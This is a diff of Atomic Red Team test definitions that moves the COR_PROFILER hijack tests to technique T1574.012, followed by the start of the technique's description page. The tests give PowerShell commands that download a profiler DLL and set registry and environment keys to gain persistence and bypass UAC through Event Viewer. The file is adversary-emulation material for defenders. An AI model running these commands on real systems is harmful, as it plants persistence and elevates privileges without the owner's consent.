+          Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1574.012/bin/T1574.012x64.dll" -OutFile "#{file_name}"
+      executor:
+        command: |
+          $env:COR_ENABLE_PROFILING = 1
+          $env:COR_PROFILER = '#{clsid_guid}'
+          $env:COR_PROFILER_PATH = '#{file_name}'
+          POWERSHELL -c 'Start-Sleep 1'
+        cleanup_command: |
+          $env:COR_ENABLE_PROFILING = 0
+          $env:COR_PROFILER = ''
+          $env:COR_PROFILER_PATH = ''
+        name: powershell
  T1546.001:
    technique:
      created: '2020-01-24T13:40:47.282Z'
@@ -1777,129 +1902,7 @@ privilege-escalation:
      - Elastic
      x_mitre_platforms:
      - Windows
-      identifier: T1546.015
-    atomic_tests:
-    - name: COM Hijack Leveraging user scope COR_PROFILER
-      auto_generated_guid: 9d5f89dc-c3a5-4f8a-a4fc-a6ed02e7cb5a
-      description: |
-        Creates user scope environment variables and CLSID COM object to enable a .NET profiler (COR_PROFILER).
-        The unmanaged profiler DLL (`atomicNotepad.dll`) executes when the CLR is loaded by the Event Viewer process.
-        Additionally, the profiling DLL will inherit the integrity level of Event Viewer bypassing UAC and executing `notepad.exe` with high integrity.
-        If the account used is not a local administrator the profiler DLL will still execute each time the CLR is loaded by a process, however,
-        the notepad process will not execute with high integrity.
-      supported_platforms:
-      - windows
-      input_arguments:
-        file_name:
-          description: unmanaged profiler DLL
-          type: Path
-          default: PathToAtomicsFolder\T1546.015\bin\T1546.015x64.dll
-        clsid_guid:
-          description: custom clsid guid
-          type: String
-          default: "{09108e71-974c-4010-89cb-acf471ae9e2c}"
-      dependency_executor_name: powershell
-      dependencies:
-      - description: "#{file_name} must be present\n"
-        prereq_command: 'if (Test-Path #{file_name}) {exit 0} else {exit 1}
-
-'
-        get_prereq_command: |
-          New-Item -Type Directory (split-path #{file_name}) -ErrorAction ignore | Out-Null
-          Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1546.015/bin/T1546.015x64.dll" -OutFile "#{file_name}"
-      executor:
-        command: |
-          Write-Host "Creating registry keys in HKCU:Software\Classes\CLSID\#{clsid_guid}" -ForegroundColor Cyan
-          New-Item -Path "HKCU:\Software\Classes\CLSID\#{clsid_guid}\InprocServer32" -Value #{file_name} -Force | Out-Null
-          New-ItemProperty -Path HKCU:\Environment -Name "COR_ENABLE_PROFILING" -PropertyType String -Value "1" -Force | Out-Null
-          New-ItemProperty -Path HKCU:\Environment -Name "COR_PROFILER" -PropertyType String -Value "#{clsid_guid}" -Force | Out-Null
-          New-ItemProperty -Path HKCU:\Environment -Name "COR_PROFILER_PATH" -PropertyType String -Value #{file_name} -Force | Out-Null
-          Write-Host "executing eventvwr.msc" -ForegroundColor Cyan
-          START MMC.EXE EVENTVWR.MSC
-        cleanup_command: "Remove-Item -Path \"HKCU:\\Software\\Classes\\CLSID\\#{clsid_guid}\"
-          -Recurse -Force -ErrorAction Ignore \nRemove-ItemProperty -Path HKCU:\\Environment
-          -Name \"COR_ENABLE_PROFILING\" -Force -ErrorAction Ignore | Out-Null\nRemove-ItemProperty
-          -Path HKCU:\\Environment -Name \"COR_PROFILER\" -Force -ErrorAction Ignore
-          | Out-Null\nRemove-ItemProperty -Path HKCU:\\Environment -Name \"COR_PROFILER_PATH\"
-          -Force -ErrorAction Ignore | Out-Null\n"
-        name: powershell
-    - name: COM Hijack Leveraging System Scope COR_PROFILER
-      auto_generated_guid: f373b482-48c8-4ce4-85ed-d40c8b3f7310
-      description: |
-        Creates system scope environment variables to enable a .NET profiler (COR_PROFILER). System scope environment variables require a restart to take effect.
-        The unmanaged profiler DLL (`atomicNotepad.dll`) executes when the CLR is loaded by any process. Additionally, the profiling DLL will inherit the integrity
-        level of Event Viewer bypassing UAC and executing `notepad.exe` with high integrity. If the account used is not a local administrator the profiler DLL will
-        still execute each time the CLR is loaded by a process, however, the notepad process will not execute with high integrity.
-      supported_platforms:
-      - windows
-      input_arguments:
-        file_name:
-          description: unmanaged profiler DLL
-          type: Path
-          default: PathToAtomicsFolder\T1546.015\bin\T1546.015x64.dll
-        clsid_guid:
-          description: custom clsid guid
-          type: String
-          default: "{09108e71-974c-4010-89cb-acf471ae9e2c}"
-      dependency_executor_name: powershell
-      dependencies:
-      - description: "#{file_name} must be present\n"
-        prereq_command: 'if (Test-Path #{file_name}) {exit 0} else {exit 1}
-
-'
-        get_prereq_command: |
-          New-Item -Type Directory (split-path #{file_name}) -ErrorAction ignore | Out-Null
-          Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1546.015/bin/T1546.015x64.dll" -OutFile "#{file_name}"
-      executor:
-        command: |
-          Write-Host "Creating system environment variables" -ForegroundColor Cyan
-          New-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\Environment' -Name "COR_ENABLE_PROFILING" -PropertyType String -Value "1" -Force | Out-Null
-          New-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\Environment' -Name "COR_PROFILER" -PropertyType String -Value "#{clsid_guid}" -Force | Out-Null
-          New-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\Environment' -Name "COR_PROFILER_PATH" -PropertyType String -Value #{file_name} -Force | Out-Null
-        cleanup_command: |
-          Remove-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\Environment' -Name "COR_ENABLE_PROFILING" -Force -ErrorAction Ignore | Out-Null
-          Remove-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\Environment' -Name "COR_PROFILER" -Force -ErrorAction Ignore | Out-Null
-          Remove-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\Environment' -Name "COR_PROFILER_PATH" -Force -ErrorAction Ignore | Out-Null
-        name: powershell
-        elevation_required: true
-    - name: COM Hijack Leveraging registry-free process scope COR_PROFILER
-      auto_generated_guid: 79d57242-bbef-41db-b301-9d01d9f6e817
-      description: 'Creates process scope environment variables to enable a .NET profiler
-        (COR_PROFILER) without making changes to the registry. The unmanaged profiler
-        DLL (`atomicNotepad.dll`) executes when the CLR is loaded by PowerShell.
-
-'
-      supported_platforms:
-      - windows
-      input_arguments:
-        file_name:
-          description: unamanged profiler DLL
-          type: Path
-          default: PathToAtomicsFolder\T1546.015\bin\T1546.015x64.dll
-        clsid_guid:
-          description: custom clsid guid
-          type: String
-          default: "{09108e71-974c-4010-89cb-acf471ae9e2c}"
-      dependency_executor_name: powershell
-      dependencies:
-      - description: "#{file_name} must be present\n"
-        prereq_command: 'if (Test-Path #{file_name}) {exit 0} else {exit 1}
-
-'
-        get_prereq_command: |
-          New-Item -Type Directory (split-path #{file_name}) -ErrorAction ignore | Out-Null
-          Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1546.015/bin/T1546.015x64.dll" -OutFile "#{file_name}"
-      executor:
-        command: |
-          $env:COR_ENABLE_PROFILING = 1
-          $env:COR_PROFILER = '#{clsid_guid}'
-          $env:COR_PROFILER_PATH = '#{file_name}'
-          POWERSHELL -c 'Start-Sleep 1'
-        cleanup_command: |
-          $env:COR_ENABLE_PROFILING = 0
-          $env:COR_PROFILER = ''
-          $env:COR_PROFILER_PATH = ''
-        name: powershell
+    atomic_tests: []
  T1134.002:
    technique:
      external_references:
@@ -9890,7 +9893,132 @@ persistence:
      - Jesse Brown, Red Canary
      x_mitre_platforms:
      - Windows
-    atomic_tests: []
+      identifier: T1574.012
+    atomic_tests:
+    - name: User scope COR_PROFILER
+      auto_generated_guid: 9d5f89dc-c3a5-4f8a-a4fc-a6ed02e7cb5a
+      description: |
+        Creates user scope environment variables and CLSID COM object to enable a .NET profiler (COR_PROFILER).
+        The unmanaged profiler DLL (`T1574.012x64.dll`) executes when the CLR is loaded by the Event Viewer process.
+        Additionally, the profiling DLL will inherit the integrity level of Event Viewer bypassing UAC and executing `notepad.exe` with high integrity.
+        If the account used is not a local administrator the profiler DLL will still execute each time the CLR is loaded by a process, however,
+        the notepad process will not execute with high integrity.
+
+        Reference: https://redcanary.com/blog/cor_profiler-for-persistence/
+      supported_platforms:
+      - windows
+      input_arguments:
+        file_name:
+          description: unmanaged profiler DLL
+          type: Path
+          default: PathToAtomicsFolder\T1574.012\bin\T1574.012x64.dll
+        clsid_guid:
+          description: custom clsid guid
+          type: String
+          default: "{09108e71-974c-4010-89cb-acf471ae9e2c}"
+      dependency_executor_name: powershell
+      dependencies:
+      - description: "#{file_name} must be present\n"
+        prereq_command: 'if (Test-Path #{file_name}) {exit 0} else {exit 1}
+
+'
+        get_prereq_command: |
+          New-Item -Type Directory (split-path #{file_name}) -ErrorAction ignore | Out-Null
+          Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1574.012/bin/T1574.012x64.dll" -OutFile "#{file_name}"
+      executor:
+        command: |
+          Write-Host "Creating registry keys in HKCU:Software\Classes\CLSID\#{clsid_guid}" -ForegroundColor Cyan
+          New-Item -Path "HKCU:\Software\Classes\CLSID\#{clsid_guid}\InprocServer32" -Value #{file_name} -Force | Out-Null
+          New-ItemProperty -Path HKCU:\Environment -Name "COR_ENABLE_PROFILING" -PropertyType String -Value "1" -Force | Out-Null
+          New-ItemProperty -Path HKCU:\Environment -Name "COR_PROFILER" -PropertyType String -Value "#{clsid_guid}" -Force | Out-Null
+          New-ItemProperty -Path HKCU:\Environment -Name "COR_PROFILER_PATH" -PropertyType String -Value #{file_name} -Force | Out-Null
+          Write-Host "executing eventvwr.msc" -ForegroundColor Cyan
+          START MMC.EXE EVENTVWR.MSC
+        cleanup_command: "Remove-Item -Path \"HKCU:\\Software\\Classes\\CLSID\\#{clsid_guid}\"
+          -Recurse -Force -ErrorAction Ignore \nRemove-ItemProperty -Path HKCU:\\Environment
+          -Name \"COR_ENABLE_PROFILING\" -Force -ErrorAction Ignore | Out-Null\nRemove-ItemProperty
+          -Path HKCU:\\Environment -Name \"COR_PROFILER\" -Force -ErrorAction Ignore
+          | Out-Null\nRemove-ItemProperty -Path HKCU:\\Environment -Name \"COR_PROFILER_PATH\"
+          -Force -ErrorAction Ignore | Out-Null\n"
+        name: powershell
+    - name: System Scope COR_PROFILER
+      auto_generated_guid: f373b482-48c8-4ce4-85ed-d40c8b3f7310
+      description: |
+        Creates system scope environment variables to enable a .NET profiler (COR_PROFILER). System scope environment variables require a restart to take effect.
+        The unmanaged profiler DLL (T1574.012x64.dll`) executes when the CLR is loaded by any process. Additionally, the profiling DLL will inherit the integrity
+        level of Event Viewer bypassing UAC and executing `notepad.exe` with high integrity. If the account used is not a local administrator the profiler DLL will
+        still execute each time the CLR is loaded by a process, however, the notepad process will not execute with high integrity.
+
+        Reference: https://redcanary.com/blog/cor_profiler-for-persistence/
+      supported_platforms:
+      - windows
+      input_arguments:
+        file_name:
+          description: unmanaged profiler DLL
+          type: Path
+          default: PathToAtomicsFolder\T1574.012\bin\T1574.012x64.dll
+        clsid_guid:
+          description: custom clsid guid
+          type: String
+          default: "{09108e71-974c-4010-89cb-acf471ae9e2c}"
+      dependency_executor_name: powershell
+      dependencies:
+      - description: "#{file_name} must be present\n"
+        prereq_command: 'if (Test-Path #{file_name}) {exit 0} else {exit 1}
+
+'
+        get_prereq_command: |
+          New-Item -Type Directory (split-path #{file_name}) -ErrorAction ignore | Out-Null
+          Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1574.012/bin/T1574.012x64.dll" -OutFile "#{file_name}"
+      executor:
+        command: |
+          Write-Host "Creating system environment variables" -ForegroundColor Cyan
+          New-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\Environment' -Name "COR_ENABLE_PROFILING" -PropertyType String -Value "1" -Force | Out-Null
+          New-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\Environment' -Name "COR_PROFILER" -PropertyType String -Value "#{clsid_guid}" -Force | Out-Null
+          New-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\Environment' -Name "COR_PROFILER_PATH" -PropertyType String -Value #{file_name} -Force | Out-Null
+        cleanup_command: |
+          Remove-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\Environment' -Name "COR_ENABLE_PROFILING" -Force -ErrorAction Ignore | Out-Null
+          Remove-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\Environment' -Name "COR_PROFILER" -Force -ErrorAction Ignore | Out-Null
+          Remove-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\Environment' -Name "COR_PROFILER_PATH" -Force -ErrorAction Ignore | Out-Null
+        name: powershell
+        elevation_required: true
+    - name: Registry-free process scope COR_PROFILER
+      auto_generated_guid: 79d57242-bbef-41db-b301-9d01d9f6e817
+      description: |
+        Creates process scope environment variables to enable a .NET profiler (COR_PROFILER) without making changes to the registry. The unmanaged profiler DLL (`T1574.012x64.dll`) executes when the CLR is loaded by PowerShell.
+
+        Reference: https://redcanary.com/blog/cor_profiler-for-persistence/
+      supported_platforms:
+      - windows
+      input_arguments:
+        file_name:
+          description: unamanged profiler DLL
+          type: Path
+          default: PathToAtomicsFolder\T1574.012\bin\T1574.012x64.dll
+        clsid_guid:
+          description: custom clsid guid
+          type: String
+          default: "{09108e71-974c-4010-89cb-acf471ae9e2c}"
+      dependency_executor_name: powershell
+      dependencies:
+      - description: "#{file_name} must be present\n"
+        prereq_command: 'if (Test-Path #{file_name}) {exit 0} else {exit 1}
+
+'
+        get_prereq_command: |
+          New-Item -Type Directory (split-path #{file_name}) -ErrorAction ignore | Out-Null
+          Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1574.012/bin/T1574.012x64.dll" -OutFile "#{file_name}"
+      executor:
+        command: |
+          $env:COR_ENABLE_PROFILING = 1
+          $env:COR_PROFILER = '#{clsid_guid}'
+          $env:COR_PROFILER_PATH = '#{file_name}'
+          POWERSHELL -c 'Start-Sleep 1'
+        cleanup_command: |
+          $env:COR_ENABLE_PROFILING = 0
+          $env:COR_PROFILER = ''
+          $env:COR_PROFILER_PATH = ''
+        name: powershell
  T1546.001:
    technique:
      created: '2020-01-24T13:40:47.282Z'
@@ -10248,129 +10376,7 @@ persistence:
      - Elastic
      x_mitre_platforms:
      - Windows
-      identifier: T1546.015
-    atomic_tests:
-    - name: COM Hijack Leveraging user scope COR_PROFILER
-      auto_generated_guid: 9d5f89dc-c3a5-4f8a-a4fc-a6ed02e7cb5a
-      description: |
-        Creates user scope environment variables and CLSID COM object to enable a .NET profiler (COR_PROFILER).
-        The unmanaged profiler DLL (`atomicNotepad.dll`) executes when the CLR is loaded by the Event Viewer process.
-        Additionally, the profiling DLL will inherit the integrity level of Event Viewer bypassing UAC and executing `notepad.exe` with high integrity.
-        If the account used is not a local administrator the profiler DLL will still execute each time the CLR is loaded by a process, however,
-        the notepad process will not execute with high integrity.
-      supported_platforms:
-      - windows
-      input_arguments:
-        file_name:
-          description: unmanaged profiler DLL
-          type: Path
-          default: PathToAtomicsFolder\T1546.015\bin\T1546.015x64.dll
-        clsid_guid:
-          description: custom clsid guid
-          type: String
-          default: "{09108e71-974c-4010-89cb-acf471ae9e2c}"
-      dependency_executor_name: powershell
-      dependencies:
-      - description: "#{file_name} must be present\n"
-        prereq_command: 'if (Test-Path #{file_name}) {exit 0} else {exit 1}
-
-'
-        get_prereq_command: |
-          New-Item -Type Directory (split-path #{file_name}) -ErrorAction ignore | Out-Null
-          Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1546.015/bin/T1546.015x64.dll" -OutFile "#{file_name}"
-      executor:
-        command: |
-          Write-Host "Creating registry keys in HKCU:Software\Classes\CLSID\#{clsid_guid}" -ForegroundColor Cyan
-          New-Item -Path "HKCU:\Software\Classes\CLSID\#{clsid_guid}\InprocServer32" -Value #{file_name} -Force | Out-Null
-          New-ItemProperty -Path HKCU:\Environment -Name "COR_ENABLE_PROFILING" -PropertyType String -Value "1" -Force | Out-Null
-          New-ItemProperty -Path HKCU:\Environment -Name "COR_PROFILER" -PropertyType String -Value "#{clsid_guid}" -Force | Out-Null
-          New-ItemProperty -Path HKCU:\Environment -Name "COR_PROFILER_PATH" -PropertyType String -Value #{file_name} -Force | Out-Null
-          Write-Host "executing eventvwr.msc" -ForegroundColor Cyan
-          START MMC.EXE EVENTVWR.MSC
-        cleanup_command: "Remove-Item -Path \"HKCU:\\Software\\Classes\\CLSID\\#{clsid_guid}\"
-          -Recurse -Force -ErrorAction Ignore \nRemove-ItemProperty -Path HKCU:\\Environment
-          -Name \"COR_ENABLE_PROFILING\" -Force -ErrorAction Ignore | Out-Null\nRemove-ItemProperty
-          -Path HKCU:\\Environment -Name \"COR_PROFILER\" -Force -ErrorAction Ignore
-          | Out-Null\nRemove-ItemProperty -Path HKCU:\\Environment -Name \"COR_PROFILER_PATH\"
-          -Force -ErrorAction Ignore | Out-Null\n"
-        name: powershell
-    - name: COM Hijack Leveraging System Scope COR_PROFILER
-      auto_generated_guid: f373b482-48c8-4ce4-85ed-d40c8b3f7310
-      description: |
-        Creates system scope environment variables to enable a .NET profiler (COR_PROFILER). System scope environment variables require a restart to take effect.
-        The unmanaged profiler DLL (`atomicNotepad.dll`) executes when the CLR is loaded by any process. Additionally, the profiling DLL will inherit the integrity
-        level of Event Viewer bypassing UAC and executing `notepad.exe` with high integrity. If the account used is not a local administrator the profiler DLL will
-        still execute each time the CLR is loaded by a process, however, the notepad process will not execute with high integrity.
-      supported_platforms:
-      - windows
-      input_arguments:
-        file_name:
-          description: unmanaged profiler DLL
-          type: Path
-          default: PathToAtomicsFolder\T1546.015\bin\T1546.015x64.dll
-        clsid_guid:
-          description: custom clsid guid
-          type: String
-          default: "{09108e71-974c-4010-89cb-acf471ae9e2c}"
-      dependency_executor_name: powershell
-      dependencies:
-      - description: "#{file_name} must be present\n"
-        prereq_command: 'if (Test-Path #{file_name}) {exit 0} else {exit 1}
-
-'
-        get_prereq_command: |
-          New-Item -Type Directory (split-path #{file_name}) -ErrorAction ignore | Out-Null
-          Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1546.015/bin/T1546.015x64.dll" -OutFile "#{file_name}"
-      executor:
-        command: |
-          Write-Host "Creating system environment variables" -ForegroundColor Cyan
-          New-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\Environment' -Name "COR_ENABLE_PROFILING" -PropertyType String -Value "1" -Force | Out-Null
-          New-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\Environment' -Name "COR_PROFILER" -PropertyType String -Value "#{clsid_guid}" -Force | Out-Null
-          New-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\Environment' -Name "COR_PROFILER_PATH" -PropertyType String -Value #{file_name} -Force | Out-Null
-        cleanup_command: |
-          Remove-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\Environment' -Name "COR_ENABLE_PROFILING" -Force -ErrorAction Ignore | Out-Null
-          Remove-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\Environment' -Name "COR_PROFILER" -Force -ErrorAction Ignore | Out-Null
-          Remove-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\Environment' -Name "COR_PROFILER_PATH" -Force -ErrorAction Ignore | Out-Null
-        name: powershell
-        elevation_required: true
-    - name: COM Hijack Leveraging registry-free process scope COR_PROFILER
-      auto_generated_guid: 79d57242-bbef-41db-b301-9d01d9f6e817
-      description: 'Creates process scope environment variables to enable a .NET profiler
-        (COR_PROFILER) without making changes to the registry. The unmanaged profiler
-        DLL (`atomicNotepad.dll`) executes when the CLR is loaded by PowerShell.
-
-'
-      supported_platforms:
-      - windows
-      input_arguments:
-        file_name:
-          description: unamanged profiler DLL
-          type: Path
-          default: PathToAtomicsFolder\T1546.015\bin\T1546.015x64.dll
-        clsid_guid:
-          description: custom clsid guid
-          type: String
-          default: "{09108e71-974c-4010-89cb-acf471ae9e2c}"
-      dependency_executor_name: powershell
-      dependencies:
-      - description: "#{file_name} must be present\n"
-        prereq_command: 'if (Test-Path #{file_name}) {exit 0} else {exit 1}
-
-'
-        get_prereq_command: |
-          New-Item -Type Directory (split-path #{file_name}) -ErrorAction ignore | Out-Null
-          Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1546.015/bin/T1546.015x64.dll" -OutFile "#{file_name}"
-      executor:
-        command: |
-          $env:COR_ENABLE_PROFILING = 1
-          $env:COR_PROFILER = '#{clsid_guid}'
-          $env:COR_PROFILER_PATH = '#{file_name}'
-          POWERSHELL -c 'Start-Sleep 1'
-        cleanup_command: |
-          $env:COR_ENABLE_PROFILING = 0
-          $env:COR_PROFILER = ''
-          $env:COR_PROFILER_PATH = ''
-        name: powershell
+    atomic_tests: []
  T1554:
    technique:
      id: attack-pattern--960c3c86-1480-4d72-b4e0-8c242e84a5c5
@@ -22038,7 +22044,132 @@ defense-evasion:
      - Jesse Brown, Red Canary
      x_mitre_platforms:
      - Windows
-    atomic_tests: []
+      identifier: T1574.012
+    atomic_tests:
+    - name: User scope COR_PROFILER
+      auto_generated_guid: 9d5f89dc-c3a5-4f8a-a4fc-a6ed02e7cb5a
+      description: |
+        Creates user scope environment variables and CLSID COM object to enable a .NET profiler (COR_PROFILER).
+        The unmanaged profiler DLL (`T1574.012x64.dll`) executes when the CLR is loaded by the Event Viewer process.
+        Additionally, the profiling DLL will inherit the integrity level of Event Viewer bypassing UAC and executing `notepad.exe` with high integrity.
+        If the account used is not a local administrator the profiler DLL will still execute each time the CLR is loaded by a process, however,
+        the notepad process will not execute with high integrity.
+
+        Reference: https://redcanary.com/blog/cor_profiler-for-persistence/
+      supported_platforms:
+      - windows
+      input_arguments:
+        file_name:
+          description: unmanaged profiler DLL
+          type: Path
+          default: PathToAtomicsFolder\T1574.012\bin\T1574.012x64.dll
+        clsid_guid:
+          description: custom clsid guid
+          type: String
+          default: "{09108e71-974c-4010-89cb-acf471ae9e2c}"
+      dependency_executor_name: powershell
+      dependencies:
+      - description: "#{file_name} must be present\n"
+        prereq_command: 'if (Test-Path #{file_name}) {exit 0} else {exit 1}
+
+'
+        get_prereq_command: |
+          New-Item -Type Directory (split-path #{file_name}) -ErrorAction ignore | Out-Null
+          Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1574.012/bin/T1574.012x64.dll" -OutFile "#{file_name}"
+      executor:
+        command: |
+          Write-Host "Creating registry keys in HKCU:Software\Classes\CLSID\#{clsid_guid}" -ForegroundColor Cyan
+          New-Item -Path "HKCU:\Software\Classes\CLSID\#{clsid_guid}\InprocServer32" -Value #{file_name} -Force | Out-Null
+          New-ItemProperty -Path HKCU:\Environment -Name "COR_ENABLE_PROFILING" -PropertyType String -Value "1" -Force | Out-Null
+          New-ItemProperty -Path HKCU:\Environment -Name "COR_PROFILER" -PropertyType String -Value "#{clsid_guid}" -Force | Out-Null
+          New-ItemProperty -Path HKCU:\Environment -Name "COR_PROFILER_PATH" -PropertyType String -Value #{file_name} -Force | Out-Null
+          Write-Host "executing eventvwr.msc" -ForegroundColor Cyan
+          START MMC.EXE EVENTVWR.MSC
+        cleanup_command: "Remove-Item -Path \"HKCU:\\Software\\Classes\\CLSID\\#{clsid_guid}\"
+          -Recurse -Force -ErrorAction Ignore \nRemove-ItemProperty -Path HKCU:\\Environment
+          -Name \"COR_ENABLE_PROFILING\" -Force -ErrorAction Ignore | Out-Null\nRemove-ItemProperty
+          -Path HKCU:\\Environment -Name \"COR_PROFILER\" -Force -ErrorAction Ignore
+          | Out-Null\nRemove-ItemProperty -Path HKCU:\\Environment -Name \"COR_PROFILER_PATH\"
+          -Force -ErrorAction Ignore | Out-Null\n"
+        name: powershell
+    - name: System Scope COR_PROFILER
+      auto_generated_guid: f373b482-48c8-4ce4-85ed-d40c8b3f7310
+      description: |
+        Creates system scope environment variables to enable a .NET profiler (COR_PROFILER). System scope environment variables require a restart to take effect.
+        The unmanaged profiler DLL (T1574.012x64.dll`) executes when the CLR is loaded by any process. Additionally, the profiling DLL will inherit the integrity
+        level of Event Viewer bypassing UAC and executing `notepad.exe` with high integrity. If the account used is not a local administrator the profiler DLL will
+        still execute each time the CLR is loaded by a process, however, the notepad process will not execute with high integrity.
+
+        Reference: https://redcanary.com/blog/cor_profiler-for-persistence/
+      supported_platforms:
+      - windows
+      input_arguments:
+        file_name:
+          description: unmanaged profiler DLL
+          type: Path
+          default: PathToAtomicsFolder\T1574.012\bin\T1574.012x64.dll
+        clsid_guid:
+          description: custom clsid guid
+          type: String
+          default: "{09108e71-974c-4010-89cb-acf471ae9e2c}"
+      dependency_executor_name: powershell
+      dependencies:
+      - description: "#{file_name} must be present\n"
+        prereq_command: 'if (Test-Path #{file_name}) {exit 0} else {exit 1}
+
+'
+        get_prereq_command: |
+          New-Item -Type Directory (split-path #{file_name}) -ErrorAction ignore | Out-Null
+          Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1574.012/bin/T1574.012x64.dll" -OutFile "#{file_name}"
+      executor:
+        command: |
+          Write-Host "Creating system environment variables" -ForegroundColor Cyan
+          New-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\Environment' -Name "COR_ENABLE_PROFILING" -PropertyType String -Value "1" -Force | Out-Null
+          New-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\Environment' -Name "COR_PROFILER" -PropertyType String -Value "#{clsid_guid}" -Force | Out-Null
+          New-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\Environment' -Name "COR_PROFILER_PATH" -PropertyType String -Value #{file_name} -Force | Out-Null
+        cleanup_command: |
+          Remove-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\Environment' -Name "COR_ENABLE_PROFILING" -Force -ErrorAction Ignore | Out-Null
+          Remove-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\Environment' -Name "COR_PROFILER" -Force -ErrorAction Ignore | Out-Null
+          Remove-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\Environment' -Name "COR_PROFILER_PATH" -Force -ErrorAction Ignore | Out-Null
+        name: powershell
+        elevation_required: true
+    - name: Registry-free process scope COR_PROFILER
+      auto_generated_guid: 79d57242-bbef-41db-b301-9d01d9f6e817
+      description: |
+        Creates process scope environment variables to enable a .NET profiler (COR_PROFILER) without making changes to the registry. The unmanaged profiler DLL (`T1574.012x64.dll`) executes when the CLR is loaded by PowerShell.
+
+        Reference: https://redcanary.com/blog/cor_profiler-for-persistence/
+      supported_platforms:
+      - windows
+      input_arguments:
+        file_name:
+          description: unamanged profiler DLL
+          type: Path
+          default: PathToAtomicsFolder\T1574.012\bin\T1574.012x64.dll
+        clsid_guid:
+          description: custom clsid guid
+          type: String
+          default: "{09108e71-974c-4010-89cb-acf471ae9e2c}"
+      dependency_executor_name: powershell
+      dependencies:
+      - description: "#{file_name} must be present\n"
+        prereq_command: 'if (Test-Path #{file_name}) {exit 0} else {exit 1}
+
+'
+        get_prereq_command: |
+          New-Item -Type Directory (split-path #{file_name}) -ErrorAction ignore | Out-Null
+          Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1574.012/bin/T1574.012x64.dll" -OutFile "#{file_name}"
+      executor:
+        command: |
+          $env:COR_ENABLE_PROFILING = 1
+          $env:COR_PROFILER = '#{clsid_guid}'
+          $env:COR_PROFILER_PATH = '#{file_name}'
+          POWERSHELL -c 'Start-Sleep 1'
+        cleanup_command: |
+          $env:COR_ENABLE_PROFILING = 0
+          $env:COR_PROFILER = ''
+          $env:COR_PROFILER_PATH = ''
+        name: powershell
  T1070.003:
    technique:
      external_references:
@@ -0,0 +1,190 @@
+# T1574.012 - COR_PROFILER
+## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1574.012)
+<blockquote>Adversaries may leverage the COR_PROFILER environment variable to hijack the execution flow of programs that load the .NET CLR. The COR_PROFILER is a .NET Framework feature which allows developers to specify an unmanaged (or external of .NET) profiling DLL to be loaded into each .NET process that loads the Common Language Runtime (CLR). These profiliers are designed to monitor, troubleshoot, and debug managed code executed by the .NET CLR.(Citation: Microsoft Profiling Mar 2017)(Citation: Microsoft COR_PROFILER Feb 2013)
+
+The COR_PROFILER environment variable can be set at various scopes (system, user, or process) resulting in different levels of influence. System and user-wide environment variable scopes are specified in the Registry, where a [Component Object Model](https://attack.mitre.org/techniques/T1559/001) (COM) object can be registered as a profiler DLL. A process scope COR_PROFILER can also be created in-memory without modifying the Registry. Starting with .NET Framework 4, the profiling DLL does not need to be registered as long as the location of the DLL is specified in the COR_PROFILER_PATH environment variable.(Citation: Microsoft COR_PROFILER Feb 2013)
+
+Adversaries may abuse COR_PROFILER to establish persistence that executes a malicious DLL in the context of all .NET processes every time the CLR is invoked. The COR_PROFILER can also be used to elevate privileges (ex: [Bypass User Access Control](https://attack.mitre.org/techniques/T1548/002)) if the victim .NET process executes at a higher permission level, as well as to hook and [Impair Defenses](https://attack.mitre.org/techniques/T1562) provided by .NET processes.(Citation: RedCanary Mockingbird May 2020)(Citation: Red Canary COR_PROFILER May 2020)(Citation: Almond COR_PROFILER Apr 2019)(Citation: GitHub OmerYa Invisi-Shell)(Citation: subTee .NET Profilers May 2017)</blockquote>
+
+## Atomic Tests
+
